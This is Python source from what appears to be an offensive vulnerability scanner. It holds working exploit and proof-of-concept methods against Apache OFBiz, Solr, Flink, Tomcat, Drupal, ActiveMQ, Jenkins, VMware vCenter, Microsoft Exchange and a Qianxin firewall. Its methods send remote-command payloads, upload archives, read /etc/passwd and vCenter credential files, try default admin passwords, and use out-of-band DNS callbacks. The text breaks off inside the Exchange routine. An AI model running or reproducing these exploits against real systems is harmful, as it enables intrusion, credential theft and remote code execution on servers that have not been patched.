def cve_2021_30128_exp(self, cmd): vul_name = "Apache OFBiz: CVE-2021-30128" headers = { 'User-Agent': self.ua, 'Content-Type': 'text/xml', 'Connection': 'close' } def _trans(s): return "%s" % ''.join('%.2x' % x for x in s) try: dns_data = bytes(cmd, encoding="utf8") dns_hex = _trans(dns_data) #print(cmd) #print(dns_hex) data = self.payload_cve_2021_30128_exp.replace( "RECOMMAND", dns_hex) url = urljoin(self.url, "/webtools/control/SOAPService") #print(data) request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if request.status_code == 200: r = "Command Executed Successfully (But No Echo)" else: r = "Command Executed Failed... ..." verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def time_2021_0515_exp(self, cmd): vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515" url = urljoin(self.url, "/services%20/WorkflowServiceXml") headers = { 'User-Agent': self.ua, 'SOAPAction': '""', 'cmd': cmd, "Content-Type": "text/xml;charset=UTF-8" } data = self.payload_time_2021_0515 try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2019_17558_exp(self, cmd): vul_name = "Apache Solr: CVE-2019-17558" core_name = None payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd) url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except AttributeError: pass url_api = self.url + "/solr/" + str(core_name) + "/config" headers_json = {'Content-Type': 'application/json', 'User-Agent': self.ua} set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """ request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False) request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False) raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2018_7602_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Drupal: CVE-2018-7602" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Drupal drupalgeddon2 remote code execution" self.vul_info["vul_numb"] = "CVE-2018-7602" self.vul_info["vul_apps"] = "Drupal" self.vul_info["vul_date"] = "2018-06-19" self.vul_info["vul_vers"] = "< 7.59, < 8.5.3" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \ "攻击者可以通过不同方式利用该漏洞远程执行代码。" \ "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。" self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" DRUPAL_U = "admin" DRUPAL_P = "admin" md = random_md5() cmd = "echo " + md try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(self.r.text, md): self.vul_info["vul_data"] = dump.dump_all(self.r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" else: self.request = requests.get(self.url + "/CHANGELOG.txt", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])", self.request.text) if self.request.status_code == 200 and r"Drupal" in self.request.text: if '7.59' not in self.allver and '8.5.3' not in self.allver: self.vul_info["vul_data"] = dump.dump_all( self.r).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info[ "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2015_5254_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2015-5254" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Flink 反序列化漏洞" self.vul_info["vul_numb"] = "CVE-2015-5254" self.vul_info["vul_apps"] = "AcitveMQ" self.vul_info["vul_date"] = "2015-07-01" self.vul_info["vul_vers"] = "< 5.13.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "反序列化漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的" \ "Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。" self.vul_info["cre_date"] = "2021-01-07" self.vul_info["cre_auth"] = "zhzyker" self.passlist = [ "admin:123456", "admin:admin", "admin:123123", "admin:activemq", "admin:12345678" ] self.ver = 5555 try: try: for self.pa in self.passlist: self.base64_p = base64.b64encode(str.encode(self.pa)) self.p = self.base64_p.decode('utf-8') self.headers_base64 = { 'User-Agent': self.ua, 'Authorization': 'Basic ' + self.p } self.request = requests.get(self.url + "/admin", headers=self.headers_base64, timeout=self.timeout, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') if self.request.status_code == 200: self.vul_info["vul_payd"] = self.pa self.get_ver = re.findall("<td><b>(.*)</b></td>", self.request.text)[1] self.ver = self.get_ver.replace(".", "") break except IndexError: pass if int(self.ver) < 5130: self.vul_info["vul_data"] = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [version: " + self.get_ver + "] [version check]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: print(e) verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2021_0410_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "QiAnXin NS-NGFW: time-2021-0410" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE" self.vul_info["vul_numb"] = "time-2021-0415" self.vul_info["vul_apps"] = "QiAnXin" self.vul_info["vul_date"] = "2021-04-10" self.vul_info["vul_vers"] = "unknow" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "RCE" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE" self.vul_info["cre_date"] = "2021-04-16" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/directdata/direct/router") md = random_md5() cmd = "echo " + md data = { "action": "SSLVPN_Resource", "method": "deleteImage", "data": [{ "data": [ "/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md + ".txt" ] }], "type": "rpc", "tid": 17 } data = json.dumps(data) try: request = requests.post(url, data=data, headers=self.headers, timeout=self.timeout, verify=False) url = urljoin(self.url, md + ".txt") req = requests.get(url, data="1", headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(req.text, md) and ( md + ".txt") not in req.text and req.status_code == 200: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = data self.vul_info["prt_info"] = "[rce:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_17518_poc(self): # 2020-01-07 self.threadLock.acquire() self.name = random_md5() self.vul_info["prt_name"] = "Apache Flink: CVE-2020-17518" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info[ "vul_payd"] = 'Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name self.vul_info["vul_name"] = "Apache Flink 任意文件写入漏洞" self.vul_info["vul_numb"] = "CVE-2020-17518" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2021-01-05" self.vul_info["vul_vers"] = "< 1.11.3 or < 1.12.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件写入" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。" \ "Apache Flink 控制面板的Submit New Job处存在任意文件上传:" self.vul_info["cre_date"] = "2021-01-07" self.vul_info["cre_auth"] = "zhzyker" self.info = "null" self.method = "post" self.r = "PoCWating" self.headers = { 'User-Agent': self.ua, 'Connection': 'close', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y' } self.data = '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y' self.data += '\nContent-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name self.data += '\n\nsuccess' self.data += '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--' try: self.r404 = requests.get(self.url + "/jars/upload", headers=self.headers, timeout=self.timeout, verify=False) self.request = requests.post(self.url + "/jars/upload", data=self.data, headers=self.headers, timeout=self.timeout, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') if self.r404.status_code == 404 and self.request.status_code == 400: if r"org.apache.flink.runtime.rest.handler.RestHandlerException:" in self.request.text: self.vul_info["vul_data"] = dump.dump_all( self.request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [upload: /tmp/" + self.name + "]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_1938_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Tomcat: CVE-2020-1938" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "WEB-INF/web.xml" self.vul_info["vul_name"] = "Tomcat ajp13 协议任意文件读取" self.vul_info["vul_numb"] = "CVE-2020-1938" self.vul_info["vul_apps"] = "Tomcat" self.vul_info["vul_date"] = "2020-02-20" self.vul_info["vul_vers"] = "< 7.0.100, < 8.5.51, < 9.0.31" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件读取 " self.vul_info["vul_data"] = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \ ">_< So there is no HTTP protocol request and response" self.vul_info["vul_desc"] = "该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数," \ "读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" headers = self.headers self.output_method = "ajp" self.default_port = self.port self.default_requri = '/' self.default_headers = {} self.username = None self.password = None self.getipport = urlparse(self.url) self.hostname = self.getipport.hostname self.request = "null" self.default_file = "WEB-INF/web.xml" try: socket.setdefaulttimeout(self.timeout) self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.connect((self.hostname, self.default_port)) self.stream = self.socket.makefile("rb", buffering=0) # PY2: bufsize=0 self.attributes = [ { 'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/'] }, { 'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', self.default_file] }, { 'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/'] }, ] method = 'GET' self.forward_request = ApacheTomcat.__prepare_ajp_forward_request( self, self.hostname, self.default_requri, method=AjpForwardRequest.REQUEST_METHODS.get(method)) if self.username is not None and self.password is not None: self.forward_request.request_headers[ 'SC_REQ_AUTHORIZATION'] = "Basic " + str( ("%s:%s" % (self.username, self.password) ).encode('base64').replace("\n" "")) for h in self.default_headers: self.forward_request.request_headers[h] = headers[h] for a in self.attributes: self.forward_request.attributes.append(a) self.responses = self.forward_request.send_and_receive( self.socket, self.stream) if len(self.responses) == 0: return None, None self.snd_hdrs_res = self.responses[0] self.data_res = self.responses[1:-1] self.request = (b"".join([d.data for d in self.data_res]).decode()) if r"Welcome to Tomcat" in self.request and r"You may obtain a copy of the License at" in self.request: self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[ajp13] [port:" + str( self.default_port) + " file:" + self.default_file + "]" verify.scan_print(self.vul_info) except socket.timeout: verify.timeout_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2019_17558_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace( "RECOMMAND", "whoami") self.vul_info[ "vul_name"] = "Apache Solr Velocity template Remote Code Execution" self.vul_info["vul_numb"] = "CVE-2018-17558" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2017-10-16" self.vul_info["vul_vers"] = "5.0.0 - 8.3.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。" self.vul_info["cre_auth"] = "zhzyker" core_name = None md = random_md5() cmd = "ping " + md + "." + self.ceye_domain payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd) url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass url_api = self.url + "/solr/" + str(core_name) + "/config" headers_json = { 'Content-Type': 'application/json', 'User-Agent': self.ua } set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """ r = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False) req = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False) request = requests.get(self.ceye_api + self.ceye_token) if md in request.text: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) elif self.vul_info[ "prt_resu"] != "PoCSuCCeSS" and r.status_code == 200 and core_name is not None: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2018_1000861_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Jenkins: CVE-2018-1000861" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2018_1000861.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "Jenkins 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2018-1000861" self.vul_info["vul_apps"] = "Jenkins" self.vul_info["vul_date"] = "2018-01-29" self.vul_info["vul_vers"] = "<= 2.153, LTS <= 2.138.3" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Jenkins 2.153和更早版本,LTS 2.138.3和更早版本使用的Stapler Web框架中的订书机" \ "/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞," \ "攻击者可以使用该方法调用某些方法通过访问不希望以这种方式调用的特制URL来访问Java对象。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" md = random_md5() cmd = "echo " + md self.c_echo = "echo \":-)\" > $JENKINS_HOME/war/robots.txt;" + cmd + " >> $JENKINS_HOME/war/robots.txt" self.c_base = base64.b64encode(str.encode(self.c_echo)) self.c_cmd = self.c_base.decode('ascii') self.cmd = urllib.parse.quote(self.c_cmd) self.payload = self.payload_cve_2018_1000861.replace( "RECOMMAND", self.cmd) try: try: self.request = requests.get(self.url, headers=self.headers, timeout=self.timeout, verify=False) self.jenkins_version = self.request.headers['X-Jenkins'] self.ver = " [version:" + self.jenkins_version + "]" except: pass self.r = requests.get(self.url + self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.request = requests.get(self.url + "/robots.txt", headers=self.headers, timeout=self.timeout, verify=False) if md in self.request.text: self.vul_info["vul_data"] = dump.dump_all(self.r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[rce] [url: " + self.url + "/robots.txt ] " else: self.c_echo = "ping " + md + "." + self.ceye_domain self.c_base = base64.b64encode(str.encode(self.c_echo)) self.c_cmd = self.c_base.decode('ascii') self.cmd = urllib.parse.quote(self.c_cmd) self.payload = self.payload_cve_2018_1000861.replace( "RECOMMAND", self.cmd) self.req = requests.get(self.url + self.payload, headers=self.headers, timeout=self.timeout, verify=False) ceye = requests.get(self.ceye_api + self.ceye_token) if md in ceye.text: self.vul_info["vul_data"] = dump.dump_all(self.req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[ceye] [cmd: " + self.c_echo + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_21972_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Vmware vCenter: CVE-2021-21972" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Vmware vCenter 任意文件上传" self.vul_info["vul_numb"] = "CVE-2021-21972" self.vul_info["vul_apps"] = "Vmware" self.vul_info["vul_date"] = "2021-02-24" self.vul_info[ "vul_vers"] = "7.0 < 7.0 U1c, 6.7 < 6.7 U3l, 6.5 < 6.5 U3n" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件上传" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "未经授权的文件上传会导致远程执行代码(RCE)(CVE-2021-21972)" self.vul_info["cre_date"] = "2021-02-25" self.vul_info["cre_auth"] = "zhzyker" headers = { "User-agent": self.ua, "Connection": "close", "Content-Type": "application/x-www-form-urlencoded" } try: url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova") res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 405: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["vul_payd"] = url self.vul_info["prt_info"] = "[upload] [url:" + url + " ]" headers = { "User-Agent": self.ua, "Accept": "*/*", "Connection": "close" } path = os.path.split(os.path.realpath(sys.argv[0]))[0] linux_tar = path + "/payload/payload/cve202121972_linux.tar" file = {'uploadFile': open(linux_tar, 'rb')} url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova") r = requests.post(url, files=file, headers=headers, timeout=self.timeout, verify=False) url = requests.compat.urljoin(self.url, "/ui/resources/vvvvvv.txt") req = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if r"upload" in req.text: self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = linux_tar self.vul_info[ "prt_info"] = "[upload] [os:linux] [url:" + url + " ]" else: windows_tar = path + "/payload/payload/cve202121972_windows.tar" file = {'uploadFile': open(windows_tar, 'rb')} url = requests.compat.urljoin( self.url, "/ui/vropspluginui/rest/services/uploadova") r = requests.post(url, files=file, headers=headers, timeout=self.timeout, verify=False) url = requests.compat.urljoin(self.url, "/ui/resources/vvvvvv.txt") req = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if r"upload" in req.text: self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = windows_tar self.vul_info[ "prt_info"] = "[upload] [os:windows] [url:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2020_1013_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Vmware vCenter: time-2020-10-13 (not cve)" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Vmware vCenter 任意文件读取" self.vul_info["vul_numb"] = "time-2020-10-13" self.vul_info["vul_apps"] = "Vmware" self.vul_info["vul_date"] = "2020-10-13" self.vul_info["vul_vers"] = "<= 6.5u1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件读取" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned." self.vul_info["cre_date"] = "2021-02-26" self.vul_info["cre_auth"] = "zhzyker" headers = { "User-agent": self.ua, "Connection": "close", } try: url = urljoin(self.url, "/eam/vib?id=/etc/passwd") res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 200 and r"root:/bin/bash" in res.text and r"root:x:0:0" in res.text: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = url self.vul_info[ "prt_info"] = "[file] [os:linux] [url:" + url + " ]" else: url = urljoin( self.url, "/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties" ) res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 200 and r"username" in res.text and r"password" in res.text and r"dirver" in res.text: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = url self.vul_info[ "prt_info"] = "[file] [os:windows] [url:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_27065_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-27065" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Microsoft Exchange Server Arbitrary File Write" self.vul_info["vul_numb"] = "CVE-2021-27065" self.vul_info["vul_apps"] = "Exchange" self.vul_info["vul_date"] = "2021-03-03" self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Arbitrary File Write" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证," \ "同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF " \ "漏洞组合进行getshell。" self.vul_info["cre_date"] = "2021-03-12" self.vul_info["cre_auth"] = "zhzyker" def __unpack_str(byte_string): return byte_string.decode('UTF-8').replace('\x00', '') def __unpack_int(format, data): return unpack(format, data)[0] def __exploit(url, name, path, qs='', data='', cookies=[], headers={}): cookies = list(cookies) cookies.extend([ 'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs), ]) if not headers: headers = {'Content-Type': 'application/json'} headers['Cookie'] = ';'.join(cookies) headers['msExchLogonMailbox'] = 'S-1-5-20' try: r = requests.post(url + "/ecp/y.js", headers=headers, data=data, verify=False, allow_redirects=False) return r except: return False def _get_sid(url, name, mail): payload = ''' <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> ''' % mail headers = { 'User-Agent': 'ExchangeServicesClient/0.0.0.0', 'Content-Type': 'text/xml' } r = __exploit(url, name, '/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers) res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text) if res: headers = { 'X-Clientapplication': 'Outlook/15.0.4815.1002', 'X-Requestid': 'x', 'X-Requesttype': 'Connect', 'Content-Type': 'application/mapi-http', } legacyDN = res.group(1) payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00' r = __exploit(url, name, '/mapi/emsmdb/', qs='', data=payload, headers=headers) res = re.search('with SID ([S\-0-9]+) ', r.text) if res: return res.group(1) else: return False else: return False def _parse_challenge(auth): target_info_field = auth[40:48] target_info_len = __unpack_int('H', target_info_field[0:2]) target_info_offset = __unpack_int('I', target_info_field[4:8]) target_info_bytes = auth[target_info_offset:target_info_offset + target_info_len] domain_name = '' computer_name = '' info_offset = 0 while info_offset < len(target_info_bytes): av_id = __unpack_int( 'H', target_info_bytes[info_offset:info_offset + 2]) av_len = __unpack_int( 'H', target_info_bytes[info_offset + 2:info_offset + 4]) av_value = target_info_bytes[info_offset + 4:info_offset + 4 + av_len] info_offset = info_offset + 4 + av_len if av_id == 